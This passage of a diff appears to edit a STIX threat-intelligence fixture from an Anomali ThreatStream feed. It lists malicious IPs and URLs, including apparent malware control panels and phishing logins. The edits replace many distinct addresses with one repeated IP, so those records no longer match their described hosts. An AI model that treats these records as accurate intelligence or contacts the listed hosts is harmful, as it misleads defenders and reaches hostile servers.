CyberCrime","id":"indicator--5384d504-8760-4255-8daa-dd156dc302d0","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-24"],"modified":"2020-01-29T03:01:13.933Z","name":"mal_ip: 78.128.76.165","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '78.128.76.165']","type":"indicator","valid_from":"2020-01-29T03:01:13.933Z"} +{"created":"2020-01-29T03:01:13.933Z","description":"TS ID: 55266539014; iType: mal_ip; State: active; Org: Lir.bg EOOD; Source: CyberCrime","id":"indicator--5384d504-8760-4255-8daa-dd156dc302d0","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-24"],"modified":"2020-01-29T03:01:13.933Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-01-29T03:01:13.933Z"} {"created":"2020-01-29T03:01:31.192Z","description":"TS ID: 55266539003; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--56b347c9-58c9-48d5-a015-2d561d855af2","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-74"],"modified":"2020-01-29T03:01:31.192Z","name":"mal_url: http://ecoorganic.co/Work5/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://ecoorganic.co/Work5/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-29T03:01:31.192Z"} {"created":"2020-01-29T03:01:37.815Z","description":"TS ID: 55266538992; iType: mal_url; State: active; Org: Exa Bytes Network Sdn.Bhd.; Source: CyberCrime","id":"indicator--840739fb-44ae-42f0-805f-422b38422325","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-76"],"modified":"2020-01-29T03:01:37.815Z","name":"mal_url: 
http://rajas.com.my/wp-content/uploads/2015/nux/Panel/lucifer/Panel/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://rajas.com.my/wp-content/uploads/2015/nux/Panel/lucifer/Panel/login.php']","type":"indicator","valid_from":"2020-01-29T03:01:37.815Z"} {"created":"2020-01-29T03:01:49.96Z","description":"TS ID: 55266539011; iType: mal_url; State: active; Org: Domain names registrar REG.RU, Ltd; Source: CyberCrime","id":"indicator--9ab8a69c-5b95-4fd6-b189-11d90ee54834","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-88"],"modified":"2020-01-29T03:01:49.96Z","name":"mal_url: http://rgmechanics.fun/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://rgmechanics.fun/panel/admin.php']","type":"indicator","valid_from":"2020-01-29T03:01:49.96Z"} 
@@ -222,26 +222,26 @@ {"created":"2020-01-29T03:02:24.081Z","description":"TS ID: 55266539001; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--d76d300b-07b7-4e9b-b7f1-9e6c0def6a6b","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-74"],"modified":"2020-01-29T03:02:24.081Z","name":"mal_url: http://ecoorganic.co/Work7/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://ecoorganic.co/Work7/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-29T03:02:24.081Z"} {"created":"2020-01-29T03:02:31.573Z","description":"TS ID: 55266539009; iType: mal_url; State: active; Org: McHost.Ru; Source: CyberCrime","id":"indicator--3c61c714-aab6-46e2-abfd-389628870d7d","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-69"],"modified":"2020-01-29T03:02:31.573Z","name":"mal_url: http://v200598.hosted-by-vdsina.ru/dashboard/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://v200598.hosted-by-vdsina.ru/dashboard/admin.php']","type":"indicator","valid_from":"2020-01-29T03:02:31.573Z"} {"created":"2020-01-29T03:02:31.605Z","description":"TS ID: 55266539007; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--3c9a39df-b4f3-4529-bfd8-d8b40801e555","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-74"],"modified":"2020-01-29T03:02:31.605Z","name":"mal_url: http://ecoorganic.co/Work1/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://ecoorganic.co/Work1/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-29T03:02:31.605Z"} -{"created":"2020-01-29T03:02:41.021Z","description":"TS ID: 55266538989; iType: mal_ip; State: active; Org: 
Telenet Ltd.; Source: CyberCrime","id":"indicator--756932e1-687c-41c9-9b55-2a762c8a1ef3","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-83"],"modified":"2020-01-29T03:02:41.021Z","name":"mal_ip: 217.29.57.178","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '217.29.57.178']","type":"indicator","valid_from":"2020-01-29T03:02:41.021Z"} +{"created":"2020-01-29T03:02:41.021Z","description":"TS ID: 55266538989; iType: mal_ip; State: active; Org: Telenet Ltd.; Source: CyberCrime","id":"indicator--756932e1-687c-41c9-9b55-2a762c8a1ef3","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-83"],"modified":"2020-01-29T03:02:41.021Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-01-29T03:02:41.021Z"} {"created":"2020-01-29T03:02:42.284Z","description":"TS ID: 55266539010; iType: mal_url; State: active; Org: McHost.Ru; Source: CyberCrime","id":"indicator--e34dc439-4789-4d5a-b7dc-471fb473f4a0","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-68"],"modified":"2020-01-29T03:02:42.284Z","name":"mal_url: http://v178903.hosted-by-vdsina.ru/dashboard/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://v178903.hosted-by-vdsina.ru/dashboard/admin.php']","type":"indicator","valid_from":"2020-01-29T03:02:42.284Z"} {"created":"2020-01-29T03:02:42.335Z","description":"TS ID: 55266538994; iType: mal_url; State: active; Org: Unified Layer; Source: CyberCrime","id":"indicator--a30fe926-53b8-43fe-a792-8ecd41071dd7","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-81"],"modified":"2020-01-29T03:02:42.335Z","name":"mal_url: 
http://tickerqube.com/Loki2020/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://tickerqube.com/Loki2020/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-29T03:02:42.335Z"} {"created":"2020-01-29T03:02:42.367Z","description":"TS ID: 55266538986; iType: mal_url; State: active; Org: Eonix Corporation; Source: CyberCrime","id":"indicator--0005f77c-327b-4b69-8046-777efe95361d","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-01-29T03:02:42.367Z","name":"mal_url: http://microsoftrenat.site/index.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://microsoftrenat.site/index.php']","type":"indicator","valid_from":"2020-01-29T03:02:42.367Z"} {"created":"2020-01-29T03:02:48.869Z","description":"TS ID: 55266539005; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--2ef4b932-5434-49f4-8255-a70de96893d8","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-74"],"modified":"2020-01-29T03:02:48.869Z","name":"mal_url: http://ecoorganic.co/Work3/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://ecoorganic.co/Work3/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-29T03:02:48.869Z"} -{"created":"2020-01-29T03:02:48.897Z","description":"TS ID: 55266538991; iType: mal_ip; State: active; Org: Domain names registrar REG.RU, Ltd; Source: CyberCrime","id":"indicator--becea156-fb29-4cd3-80b1-55cb739e0b6c","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-21"],"modified":"2020-01-29T03:02:48.897Z","name":"mal_ip: 31.31.196.78","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = 
'31.31.196.78']","type":"indicator","valid_from":"2020-01-29T03:02:48.897Z"} +{"created":"2020-01-29T03:02:48.897Z","description":"TS ID: 55266538991; iType: mal_ip; State: active; Org: Domain names registrar REG.RU, Ltd; Source: CyberCrime","id":"indicator--becea156-fb29-4cd3-80b1-55cb739e0b6c","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-21"],"modified":"2020-01-29T03:02:48.897Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-01-29T03:02:48.897Z"} {"created":"2020-01-30T02:58:32.284Z","description":"TS ID: 55270319168; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--8da10219-9eb1-4963-8889-587598e511cd","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-92"],"modified":"2020-01-30T02:58:32.284Z","name":"mal_url: http://www.cpadeer.com/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://www.cpadeer.com/login']","type":"indicator","valid_from":"2020-01-30T02:58:32.284Z"} {"created":"2020-01-31T02:19:29.045Z","description":"TS ID: 55274447486; iType: mal_url; State: active; Org: SingleHop LLC; Source: CyberCrime","id":"indicator--093bf827-0d84-4b54-9d62-dffffd0a619b","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-81"],"modified":"2020-01-31T02:19:29.045Z","name":"mal_url: http://cleaning-hygiene.com/kay/Panel/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://cleaning-hygiene.com/kay/Panel/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-31T02:19:29.045Z"} {"created":"2020-01-31T02:22:09.726Z","description":"TS ID: 55274447484; iType: mal_url; State: active; Org: ServerMania; 
Source: CyberCrime","id":"indicator--51d4eb13-adf7-4de1-a3f0-106d343ad560","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-01-31T02:22:09.726Z","name":"mal_url: http://corpcougar.com/buggy/Panel/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://corpcougar.com/buggy/Panel/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-31T02:22:09.726Z"} {"created":"2020-02-01T02:03:02.79Z","description":"TS ID: 55277443309; iType: mal_url; State: active; Org: Limited liability company Mail.Ru; Source: CyberCrime","id":"indicator--a5926161-953c-4763-9d10-0c5e10bcd4e4","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-85"],"modified":"2020-02-01T02:03:02.79Z","name":"mal_url: http://marubemi.com/owen/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://marubemi.com/owen/admin.php']","type":"indicator","valid_from":"2020-02-01T02:03:02.79Z"} -{"created":"2020-02-01T02:03:07.047Z","description":"TS ID: 55277443409; iType: mal_ip; State: active; Org: IT House, Ltd; Source: CyberCrime","id":"indicator--ee4a872e-e53e-428f-86a1-32c4e4db68f6","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-28"],"modified":"2020-02-01T02:03:07.047Z","name":"mal_ip: 62.76.41.133","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '62.76.41.133']","type":"indicator","valid_from":"2020-02-01T02:03:07.047Z"} +{"created":"2020-02-01T02:03:07.047Z","description":"TS ID: 55277443409; iType: mal_ip; State: active; Org: IT House, Ltd; Source: 
CyberCrime","id":"indicator--ee4a872e-e53e-428f-86a1-32c4e4db68f6","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-28"],"modified":"2020-02-01T02:03:07.047Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-02-01T02:03:07.047Z"} {"created":"2020-02-01T02:03:48.038Z","description":"TS ID: 55277443373; iType: mal_url; State: active; Org: Limited liability company Mail.Ru; Source: CyberCrime","id":"indicator--8494f340-0964-47f0-ba09-78fe0b76eb34","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-85"],"modified":"2020-02-01T02:03:48.038Z","name":"mal_url: http://zeyadigital.com/etty/black/download/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://zeyadigital.com/etty/black/download/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-01T02:03:48.038Z"} {"created":"2020-02-01T02:03:48.079Z","description":"TS ID: 55277443242; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime","id":"indicator--f051e10a-76c9-4f14-9fa3-9dbccc65c26f","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-02-01T02:03:48.079Z","name":"mal_url: http://farzanatradings.com/maindon/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://farzanatradings.com/maindon/panel/admin.php']","type":"indicator","valid_from":"2020-02-01T02:03:48.079Z"} {"created":"2020-02-01T02:04:16.392Z","description":"TS ID: 55277443446; iType: mal_url; State: active; Org: IT House, Ltd; Source: 
CyberCrime","id":"indicator--79c8f52b-f134-4e02-ad7a-6169063c8fba","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-85"],"modified":"2020-02-01T02:04:16.392Z","name":"mal_url: http://trouserlanditd.com/draw/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://trouserlanditd.com/draw/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-01T02:04:16.392Z"} {"created":"2020-02-01T02:04:21.636Z","description":"TS ID: 55277443452; iType: mal_url; State: active; Org: IHNetworks, LLC; Source: CyberCrime","id":"indicator--7338fc3d-2a1f-4583-b34d-eb76912a43e6","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-88"],"modified":"2020-02-01T02:04:21.636Z","name":"mal_url: http://krompres.tk/loki/Panel/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://krompres.tk/loki/Panel/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-01T02:04:21.636Z"} -{"created":"2020-02-01T02:04:21.676Z","description":"TS ID: 55277443202; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime","id":"indicator--1f9e0571-119c-448a-8656-fec49c9c058a","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-83"],"modified":"2020-02-01T02:04:21.676Z","name":"mal_url: http://5.188.60.23/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://5.188.60.23/login']","type":"indicator","valid_from":"2020-02-01T02:04:21.676Z"} +{"created":"2020-02-01T02:04:21.676Z","description":"TS ID: 55277443202; iType: mal_url; State: active; Org: MoreneHost; Source: 
CyberCrime","id":"indicator--1f9e0571-119c-448a-8656-fec49c9c058a","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-83"],"modified":"2020-02-01T02:04:21.676Z","name":"mal_url: http://89.160.20.156/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/login']","type":"indicator","valid_from":"2020-02-01T02:04:21.676Z"} {"created":"2020-02-01T02:04:21.705Z","description":"TS ID: 55277443078; iType: mal_url; State: active; Org: Beget Ltd; Source: CyberCrime","id":"indicator--d1161e31-f661-469c-b206-84e1d416e577","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-73"],"modified":"2020-02-01T02:04:21.705Z","name":"mal_url: http://gosdick.beget.tech/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://gosdick.beget.tech/login']","type":"indicator","valid_from":"2020-02-01T02:04:21.705Z"} -{"created":"2020-02-01T02:04:21.745Z","description":"TS ID: 55277442685; iType: mal_ip; State: active; Org: LLC Baxet; Source: CyberCrime","id":"indicator--8f0a9931-5ee4-4b0e-b473-b130d72ef175","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-17"],"modified":"2020-02-01T02:04:21.745Z","name":"mal_ip: 185.22.155.46","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '185.22.155.46']","type":"indicator","valid_from":"2020-02-01T02:04:21.745Z"} +{"created":"2020-02-01T02:04:21.745Z","description":"TS ID: 55277442685; iType: mal_ip; State: active; Org: LLC Baxet; Source: CyberCrime","id":"indicator--8f0a9931-5ee4-4b0e-b473-b130d72ef175","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-17"],"modified":"2020-02-01T02:04:21.745Z","name":"mal_ip: 
89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-02-01T02:04:21.745Z"} {"created":"2020-02-01T02:05:07.232Z","description":"TS ID: 55277443523; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--0068cb9c-0bdf-44a8-9563-5006e0c38921","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-80"],"modified":"2020-02-01T02:05:07.232Z","name":"mal_url: http://everest--sh.com/click/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://everest--sh.com/click/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-01T02:05:07.232Z"} -{"created":"2020-02-01T02:05:07.274Z","description":"TS ID: 55277442283; iType: mal_url; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime","id":"indicator--2dd49cbe-4835-49ea-a29c-b173c0840506","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-90"],"modified":"2020-02-01T02:05:07.274Z","name":"mal_url: http://92.63.197.156/tspir/index.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://92.63.197.156/tspir/index.php']","type":"indicator","valid_from":"2020-02-01T02:05:07.274Z"} +{"created":"2020-02-01T02:05:07.274Z","description":"TS ID: 55277442283; iType: mal_url; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime","id":"indicator--2dd49cbe-4835-49ea-a29c-b173c0840506","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-90"],"modified":"2020-02-01T02:05:07.274Z","name":"mal_url: http://89.160.20.156/tspir/index.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 
'http://89.160.20.156/tspir/index.php']","type":"indicator","valid_from":"2020-02-01T02:05:07.274Z"} {"created":"2020-02-01T02:06:07.042Z","description":"TS ID: 55277443220; iType: mal_url; State: active; Org: OVH Hosting; Source: CyberCrime","id":"indicator--b8e709b0-7eb8-4b2b-94f0-e21c4138cf9b","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-02-01T02:06:07.042Z","name":"mal_url: http://vware.duckdns.org/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://vware.duckdns.org/panel/admin.php']","type":"indicator","valid_from":"2020-02-01T02:06:07.042Z"} {"created":"2020-02-01T02:06:15.505Z","description":"TS ID: 55277443605; iType: mal_url; State: active; Org: Branch of BachKim Network solutions jsc; Source: CyberCrime","id":"indicator--10e62d11-dbc5-4d39-badf-574aaab2d0f5","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-79"],"modified":"2020-02-01T02:06:15.505Z","name":"mal_url: http://cokhiquangbien.com/.jx/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://cokhiquangbien.com/.jx/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-01T02:06:15.505Z"} {"created":"2020-02-01T02:06:15.674Z","description":"TS ID: 55277443276; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime","id":"indicator--a84ddb39-c02c-44cc-bac3-0056c279454c","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-02-01T02:06:15.674Z","name":"mal_url: http://corpcougar.com/nedu/Panel/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 
'http://corpcougar.com/nedu/Panel/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-01T02:06:15.674Z"} 
@@ -249,11 +249,11 @@ {"created":"2020-02-01T02:06:38.733Z","description":"TS ID: 55277442690; iType: mal_url; State: active; Org: Choopa, LLC; Source: CyberCrime","id":"indicator--a81a2408-b11b-4b28-a5b6-ffec11942d62","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-32"],"modified":"2020-02-01T02:06:38.733Z","name":"mal_url: http://144.202.96.212/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://144.202.96.212/panel/admin.php']","type":"indicator","valid_from":"2020-02-01T02:06:38.733Z"} {"created":"2020-02-01T02:06:49.292Z","description":"TS ID: 55277443216; iType: mal_url; State: active; Org: Beget Ltd; Source: CyberCrime","id":"indicator--4a414cbe-3e02-48b9-84fb-103ed9961e6c","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-75"],"modified":"2020-02-01T02:06:49.292Z","name":"mal_url: http://papafrog.beget.tech/index.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://papafrog.beget.tech/index.php']","type":"indicator","valid_from":"2020-02-01T02:06:49.292Z"} {"created":"2020-02-01T02:07:27.633Z","description":"TS ID: 55277443028; iType: mal_url; State: active; Org: Beget Ltd; Source: CyberCrime","id":"indicator--27f66dbf-4ce9-4616-aef1-c6ab9f224ecb","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-02-01T02:07:27.633Z","name":"mal_url: http://t917659s.beget.tech/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://t917659s.beget.tech/login']","type":"indicator","valid_from":"2020-02-01T02:07:27.633Z"} -{"created":"2020-02-01T02:07:36.513Z","description":"TS ID: 55277443145; iType: mal_url; State: active; Org: Host Europe GmbH; Source: 
CyberCrime","id":"indicator--4cd504ee-3b5e-439f-b37d-3e932b200a55","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-72"],"modified":"2020-02-01T02:07:36.513Z","name":"mal_url: http://185.136.159.206/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://185.136.159.206/login']","type":"indicator","valid_from":"2020-02-01T02:07:36.513Z"} +{"created":"2020-02-01T02:07:36.513Z","description":"TS ID: 55277443145; iType: mal_url; State: active; Org: Host Europe GmbH; Source: CyberCrime","id":"indicator--4cd504ee-3b5e-439f-b37d-3e932b200a55","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-72"],"modified":"2020-02-01T02:07:36.513Z","name":"mal_url: http://89.160.20.156/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/login']","type":"indicator","valid_from":"2020-02-01T02:07:36.513Z"} {"created":"2020-02-01T02:08:09.833Z","description":"TS ID: 55277443560; iType: mal_url; State: active; Org: IHNetworks, LLC; Source: CyberCrime","id":"indicator--7d803ca2-4e7d-414e-9693-854d08c49bb6","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-88"],"modified":"2020-02-01T02:08:09.833Z","name":"mal_url: http://drop-box.top/Lokivo/Panel/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://drop-box.top/Lokivo/Panel/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-01T02:08:09.833Z"} -{"created":"2020-02-01T02:08:09.939Z","description":"TS ID: 55277442673; iType: mal_url; State: active; Org: Mir Telematiki Ltd; Source: 
CyberCrime","id":"indicator--7cbc0a23-df38-4526-84b1-b344948f0b72","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-63"],"modified":"2020-02-01T02:08:09.939Z","name":"mal_url: http://94.177.123.112/xcool!/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://94.177.123.112/xcool!/admin.php']","type":"indicator","valid_from":"2020-02-01T02:08:09.939Z"} -{"created":"2020-02-01T02:08:31.777Z","description":"TS ID: 55277443138; iType: mal_ip; State: active; Org: Alibaba; Source: CyberCrime","id":"indicator--9530c9fb-99b6-40af-b14a-a622cff510b1","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-83"],"modified":"2020-02-01T02:08:31.777Z","name":"mal_ip: 47.241.1.46","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '47.241.1.46']","type":"indicator","valid_from":"2020-02-01T02:08:31.777Z"} -{"created":"2020-02-01T02:08:31.818Z","description":"TS ID: 55277442273; iType: mal_ip; State: active; Org: Limited liability company Mail.Ru; Source: CyberCrime","id":"indicator--6955fd8f-b856-43aa-bac7-0d5a2d8519f2","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-85"],"modified":"2020-02-01T02:08:31.818Z","name":"mal_ip: 95.163.212.79","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '95.163.212.79']","type":"indicator","valid_from":"2020-02-01T02:08:31.818Z"} +{"created":"2020-02-01T02:08:09.939Z","description":"TS ID: 55277442673; iType: mal_url; State: active; Org: Mir Telematiki Ltd; Source: CyberCrime","id":"indicator--7cbc0a23-df38-4526-84b1-b344948f0b72","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-63"],"modified":"2020-02-01T02:08:09.939Z","name":"mal_url: 
http://89.160.20.156/xcool!/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/xcool!/admin.php']","type":"indicator","valid_from":"2020-02-01T02:08:09.939Z"} +{"created":"2020-02-01T02:08:31.777Z","description":"TS ID: 55277443138; iType: mal_ip; State: active; Org: Alibaba; Source: CyberCrime","id":"indicator--9530c9fb-99b6-40af-b14a-a622cff510b1","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-83"],"modified":"2020-02-01T02:08:31.777Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-02-01T02:08:31.777Z"} +{"created":"2020-02-01T02:08:31.818Z","description":"TS ID: 55277442273; iType: mal_ip; State: active; Org: Limited liability company Mail.Ru; Source: CyberCrime","id":"indicator--6955fd8f-b856-43aa-bac7-0d5a2d8519f2","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-85"],"modified":"2020-02-01T02:08:31.818Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-02-01T02:08:31.818Z"} {"created":"2020-02-01T02:08:42.76Z","description":"TS ID: 55277443599; iType: mal_url; State: active; Org: IHNetworks, LLC; Source: 